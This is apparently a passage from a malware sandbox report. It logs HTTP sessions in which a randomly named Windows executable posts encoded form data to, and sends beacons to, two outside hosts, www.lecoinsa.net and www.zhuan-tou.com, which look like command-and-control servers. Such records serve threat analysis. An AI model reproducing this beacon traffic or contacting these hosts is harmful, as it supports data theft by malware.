Jun 13, 2024 11:06:12.059601068 CEST	729	OUT	POST /xu8t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.lecoinsa.net Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lecoinsa.net Referer: http://www.lecoinsa.net/xu8t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 4a 66 67 56 57 72 38 44 75 6e 50 68 6a 72 71 6d 2f 59 4e 32 50 6c 2f 4c 4a 34 52 33 57 71 6c 38 56 43 6c 5a 49 47 4c 38 49 44 4b 56 73 4d 71 68 4f 4f 63 31 65 43 58 66 39 6e 52 62 36 42 38 39 74 63 75 48 77 54 78 35 4d 2f 63 78 39 34 41 43 70 37 46 6c 53 34 52 35 66 31 55 30 31 4f 46 56 35 4f 42 50 61 78 30 79 69 46 61 36 34 6a 45 47 38 76 4e 32 77 4a 69 56 43 6c 32 7a 35 6e 6d 42 38 71 2b 6a 67 69 53 43 77 44 34 57 41 5a 39 44 74 34 66 52 31 4c 31 41 2f 7a 56 74 36 49 35 4b 50 38 42 44 73 2b 2b 44 4d 45 4d 6e 6e 6b 4d 6b 2b 68 69 53 70 66 38 58 73 49 71 4d 34 61 4c 37 73 46 38 4c 2b 66 63 66 37 4a 59 46 73 4e 42 7a Data Ascii: fD=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wql8VClZIGL8IDKVsMqhOOc1eCXf9nRb6B89tcuHwTx5M/cx94ACp7FlS4R5f1U01OFV5OBPax0yiFa64jEG8vN2wJiVCl2z5nmB8q+jgiSCwD4WAZ9Dt4fR1L1A/zVt6I5KP8BDs++DMEMnnkMk+hiSpf8XsIqM4aL7sF8L+fcf7JYFsNBz
Jun 13, 2024 11:06:12.958611012 CEST	598	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 13 Jun 2024 09:06:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://lecoinsa.net/xu8t/ Origin-Agent-Cluster: ?0 Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED] Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49750	217.116.0.191	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:14.586801052 CEST	1746	OUT	POST /xu8t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.lecoinsa.net Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lecoinsa.net Referer: http://www.lecoinsa.net/xu8t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 4a 66 67 56 57 72 38 44 75 6e 50 68 6a 72 71 6d 2f 59 4e 32 50 6c 2f 4c 4a 34 52 33 57 71 74 38 56 30 52 5a 48 42 66 38 4a 44 4b 56 67 73 71 6b 4f 4f 64 74 65 43 50 62 39 6e 4d 73 36 45 77 39 74 2b 6d 48 6e 52 56 35 46 2f 63 78 79 59 41 50 30 72 45 68 53 38 4e 31 66 78 77 30 31 4f 46 56 35 4e 4a 50 4a 41 30 79 76 6c 62 49 2f 6a 46 48 33 50 4e 53 77 49 47 46 43 6c 79 6a 35 55 65 42 38 4b 75 6a 7a 6e 4f 43 76 7a 34 55 44 5a 39 62 74 35 6a 4b 31 4c 35 4d 2f 79 68 4c 36 50 4e 4b 66 4c 77 76 2b 4e 61 31 58 55 6f 68 6a 46 59 58 69 41 58 31 67 4e 30 7a 68 72 79 6a 36 37 6e 4c 70 31 63 63 2f 4f 4e 6a 70 34 51 54 74 36 74 39 39 51 4d 69 6f 53 46 50 31 68 68 34 6b 64 45 77 6e 36 2f 39 36 2b 34 52 49 2b 64 30 4d 32 4e 41 55 2f 79 71 50 7a 4c 2b 38 2b 73 35 36 77 31 43 42 64 30 78 41 41 54 75 2b 4f 4e 64 6f 2b 49 66 54 50 71 46 49 4e 67 64 2f 51 64 57 4a 76 4e 70 36 37 68 52 6c 74 4b 6a 62 78 77 53 6e 71 52 50 70 7a 75 4f 6b 43 49 44 39 69 59 6f 49 57 46 53 30 33 76 [TRUNCATED] Data Ascii: fD=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wqt8V0RZHBf8JDKVgsqkOOdteCPb9nMs6Ew9t+mHnRV5F/cxyYAP0rEhS8N1fxw01OFV5NJPJA0yvlbI/jFH3PNSwIGFClyj5UeB8KujznOCvz4UDZ9bt5jK1L5M/yhL6PNKfLwv+Na1XUohjFYXiAX1gN0zhryj67nLp1cc/ONjp4QTt6t99QMioSFP1hh4kdEwn6/96+4RI+d0M2NAU/yqPzL+8+s56w1CBd0xAATu+ONdo+IfTPqFINgd/QdWJvNp67hRltKjbxwSnqRPpzuOkCID9iYoIWFS03vcWWsb2WOGbwobbGE5aAwO8+WKNa5LCjr8pbksPLdEdWUFGPDgZoq8hWmNO9ajM8ax+JQWWJf0AuJX/Vp70WV01XFx98Uly/1XFo2zS7YyLIwy6oeX5j5O61IjLu0iQm4hknxDISMgw7aSFifkXiW71a22MQNem7ehsu7x0dr4MI8LtWAoMcHxjXHIYf7QGKE+QOflrr9Il0mvxKmlt/KFytYGFenGjXL9f1c7In3+O2nTYenKJTdszEtNmHXg0xCVrfYLoxqHSoID1myjpcI57uGSCSVl7rMf2CWzvAzqvFE4dNhIkjjoTjjOG4BcWLO2iZiN19Cv1pKCg1PFw6yCsyerzaqdt6U/fHWjjeKvwf2++itq95qdJIDANwCWDfJbt1o1hxrhIIZZ8SvokER5+NCYAIk0docDG13yYKfDbCXC4eEdTmRk+WuuMMCVAH0G0DV67jRHxFpCkByvh/OjDfdv9ZNB5u60XRu975j0SVHsWv36gjOmXgYDE7ABi2vRB19SdauCxVbf96MPPh9memMx6LOJY8D0UPCxbgPO6y8znt5wwH3653YZI2/xen9t5vzlelY6RtwzxbBogS8Jzwjmu38hh/hftzPrRxQyiYTRpu1jQXECI2cLpTsW9E9Y4Rt72SxkdEhPkVNlqIxkgkXoXzuzo4bq2 [TRUNCATED]
Jun 13, 2024 11:06:15.477722883 CEST	598	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 13 Jun 2024 09:06:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://lecoinsa.net/xu8t/ Origin-Agent-Cluster: ?0 Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED] Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49751	217.116.0.191	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:17.125610113 CEST	451	OUT	GET /xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.lecoinsa.net Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:06:18.009357929 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 13 Jun 2024 09:06:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 962 Connection: close Location: http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ Origin-Agent-Cluster: ?0 Age: 0 X-Cache: MISS X-BKSrc: 0.5 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3f 66 44 3d 6f 4c 44 70 43 6e 62 4e 35 45 4d 74 56 76 4e 75 45 59 77 36 67 68 33 37 38 62 36 38 37 62 4a 78 50 54 6e 41 53 63 5a 58 48 4b 78 68 4a 6b 31 4f 4d 78 53 52 47 41 43 64 30 49 75 69 43 4e 6c 6b 59 41 72 56 36 46 38 76 7a 6b 34 49 30 4f 71 7a 68 52 45 75 4b 66 51 6e 6f 50 4d 64 6f 65 78 6b 54 34 4a 57 61 6a 78 76 31 70 77 32 75 6f 38 46 66 78 49 49 76 6b 4c 6b 6a 6a 74 46 39 65 63 38 6b 51 3d 3d 26 61 6d 70 3b 6a 30 3d 76 54 63 6c 5f 32 58 38 51 4a 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ'" /> <title>Redirecting to http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ">http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687
Jun 13, 2024 11:06:18.009433985 CEST	146	IN	Data Raw: 62 4a 78 50 54 6e 41 53 63 5a 58 48 4b 78 68 4a 6b 31 4f 4d 78 53 52 47 41 43 64 30 49 75 69 43 4e 6c 6b 59 41 72 56 36 46 38 76 7a 6b 34 49 30 4f 71 7a 68 52 45 75 4b 66 51 6e 6f 50 4d 64 6f 65 78 6b 54 34 4a 57 61 6a 78 76 31 70 77 32 75 6f 38 Data Ascii: bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ</a>. </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49752	103.120.80.111	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:23.739181995 CEST	712	OUT	POST /lx5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.zhuan-tou.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.zhuan-tou.com Referer: http://www.zhuan-tou.com/lx5p/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 6b 6f 30 38 36 33 41 52 33 2f 5a 34 37 67 6a 44 36 42 77 76 4b 55 41 52 46 39 65 2f 62 6b 4d 41 54 73 59 53 61 76 70 6a 7a 2b 56 61 45 48 57 7a 46 44 41 32 73 44 36 44 63 6d 61 53 6b 67 6d 65 49 73 73 7a 47 73 5a 49 51 33 52 48 6b 4c 69 64 49 36 41 37 52 4c 54 50 6e 57 5a 76 50 57 64 75 78 6b 79 79 33 33 42 74 56 64 62 57 4b 6d 67 58 6d 72 34 35 4a 56 30 74 43 67 32 2f 70 48 57 50 70 78 4f 71 58 56 63 53 5a 34 30 51 43 37 43 4f 68 35 35 58 63 33 33 47 30 34 6d 2b 48 48 30 58 4f 78 31 55 4a 66 2b 6e 4a 42 36 68 32 68 66 4c 42 47 34 6d 51 6c 66 58 7a 38 51 3d Data Ascii: fD=hwaL+uV2m5L5ko0863AR3/Z47gjD6BwvKUARF9e/bkMATsYSavpjz+VaEHWzFDA2sD6DcmaSkgmeIsszGsZIQ3RHkLidI6A7RLTPnWZvPWduxkyy33BtVdbWKmgXmr45JV0tCg2/pHWPpxOqXVcSZ40QC7COh55Xc33G04m+HH0XOx1UJf+nJB6h2hfLBG4mQlfXz8Q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49753	103.120.80.111	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:26.280071020 CEST	732	OUT	POST /lx5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.zhuan-tou.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.zhuan-tou.com Referer: http://www.zhuan-tou.com/lx5p/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 2b 49 45 38 38 57 41 52 31 66 5a 35 2b 67 6a 44 77 68 77 7a 4b 55 4d 52 46 35 50 67 62 79 55 41 54 4d 6f 53 64 75 70 6a 67 4f 56 61 63 58 57 32 4c 6a 41 35 73 44 2f 30 63 6e 6d 53 6b 6b 32 65 49 70 51 7a 48 66 68 4c 43 33 52 46 73 72 69 66 46 61 41 37 52 4c 54 50 6e 57 4e 42 50 57 46 75 77 56 43 79 32 54 56 69 57 64 62 52 4e 6d 67 58 77 62 34 39 4a 56 31 4b 43 69 53 46 70 46 2b 50 70 30 79 71 58 45 63 64 51 34 30 53 47 37 44 57 70 35 52 59 62 33 6a 70 72 62 6e 6e 47 46 38 70 43 6e 59 2b 54 39 32 50 61 68 57 5a 6d 79 58 38 51 32 5a 50 4b 47 50 6e 74 72 45 36 61 37 4a 7a 53 36 51 55 65 41 4f 71 34 2f 5a 73 31 4a 6b 61 Data Ascii: fD=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbyUATMoSdupjgOVacXW2LjA5sD/0cnmSkk2eIpQzHfhLC3RFsrifFaA7RLTPnWNBPWFuwVCy2TViWdbRNmgXwb49JV1KCiSFpF+Pp0yqXEcdQ40SG7DWp5RYb3jprbnnGF8pCnY+T92PahWZmyX8Q2ZPKGPntrE6a7JzS6QUeAOq4/Zs1Jka

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49754	103.120.80.111	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:28.807638884 CEST	1749	OUT	POST /lx5p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.zhuan-tou.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.zhuan-tou.com Referer: http://www.zhuan-tou.com/lx5p/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 2b 49 45 38 38 57 41 52 31 66 5a 35 2b 67 6a 44 77 68 77 7a 4b 55 4d 52 46 35 50 67 62 79 63 41 53 2b 67 53 64 4e 42 6a 78 2b 56 61 56 33 57 33 4c 6a 41 67 73 44 48 34 63 6e 72 70 6b 6d 2b 65 4c 50 6b 7a 41 75 68 4c 59 6e 52 46 67 4c 69 65 49 36 41 71 52 4c 44 4c 6e 57 64 42 50 57 46 75 77 57 61 79 79 48 42 69 51 64 62 57 4b 6d 67 4c 6d 72 35 61 4a 56 39 77 43 69 47 56 70 30 65 50 71 55 43 71 57 32 30 64 4d 6f 30 55 49 62 44 46 70 35 4d 59 62 32 50 50 72 59 37 4e 47 48 73 70 47 42 31 2f 4f 75 75 57 50 78 65 4b 6b 52 72 57 47 52 52 63 54 41 58 74 71 37 63 70 47 49 56 71 48 39 64 55 54 30 33 59 75 2b 68 39 36 4e 56 6f 2f 36 43 38 74 34 33 2f 76 62 56 42 59 6a 52 72 36 7a 53 52 64 76 6c 4c 32 68 54 70 56 32 72 6e 57 30 4c 7a 4a 6b 31 4d 4a 76 32 38 36 71 57 53 6c 7a 2f 52 55 68 4f 53 62 43 4d 67 74 47 30 75 47 4e 39 51 36 76 69 63 66 44 35 4c 63 46 4f 54 65 62 68 70 76 32 79 35 75 55 31 78 48 48 76 68 30 43 42 44 44 6d 42 54 36 68 44 67 56 74 56 33 62 71 4c [TRUNCATED] Data Ascii: fD=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbycAS+gSdNBjx+VaV3W3LjAgsDH4cnrpkm+eLPkzAuhLYnRFgLieI6AqRLDLnWdBPWFuwWayyHBiQdbWKmgLmr5aJV9wCiGVp0ePqUCqW20dMo0UIbDFp5MYb2PPrY7NGHspGB1/OuuWPxeKkRrWGRRcTAXtq7cpGIVqH9dUT03Yu+h96NVo/6C8t43/vbVBYjRr6zSRdvlL2hTpV2rnW0LzJk1MJv286qWSlz/RUhOSbCMgtG0uGN9Q6vicfD5LcFOTebhpv2y5uU1xHHvh0CBDDmBT6hDgVtV3bqL0GdMshe7FHv7Bgt6bqU6UxSRdmpSEBIuUx9PeBxCJJzVXIauxUcWeBs+N3HDzS78jKZVUYioOMAZM1s7ZAb5Yl0BnFI79Tm9xda+pkr+jlfnZpC0jrL1gNYsFfVrPFWkqcsL1DeksQ+X85fkcBc0i7w/iOh+NlNCkXVLPHgi2oOms6jq9MUHAPxjV2UEpNXaB7hEDk+cYg33zZPErvC3XmeZCj9BBj646QfctoD1DBEcb0PrZtzIJLEJyPQwkOFPqQbkKzAUJmOJqkeeIx5afJVKYhnJjeY4PtrgCng4zaRbjnUkVVbfr6WuDEsxnQvTQdF1TNPN6YhnbK2n8Etg18S1jxmkiwcp6fRKDUKfvI9zCrWk6w28vvlONDZyKLmoWiETzSLJnJ6bfSXNSbbMl5XzfbLVF6LpxhKWsnd1To5dIkERvL0fqtGXSRYrSOfkGCnulaCQN8P27ykxi7ntJWigb00ntMSMYds8oa6JEVAhXYillLaBh6KZkq/r94BhqunBrreL7xRHwXslixVrmAza/TomsF+MVC+24gyV0zuyCbnlD5MilBROz+B1cS4h64VT2UeeO8b44kvukI1sd/NX3vH9PC4kOOoQ9XHsrFUG50IX4YCVCNTvNOh2pb3yTZcMNHyEm+y+QPAlg7a/lCEEl9fpQ6ov3l [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49755	103.120.80.111	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:31.339003086 CEST	452	OUT	GET /lx5p/?fD=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.zhuan-tou.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:06:32.316447020 CEST	1236	IN	HTTP/1.1 200 OK Server: wts/1.7.0 Date: Thu, 13 Jun 2024 09:06:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: "65517fce-1a10" Data Raw: 31 61 32 39 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 7a 68 75 61 6e 2d 74 6f 75 2e 63 6f 6d 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 75 61 6e 2d 74 6f 75 2e 63 6f 6d 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 [TRUNCATED] Data Ascii: 1a29<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>zhuan-tou.com-(www.west.cn)</title> <meta name="description" content="zhuan-tou.com," /> <meta name="keywords" content="zhuan-tou.com," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
Jun 13, 2024 11:06:32.316462040 CEST	1236	IN	Data Raw: 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 Data Ascii: { height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd,
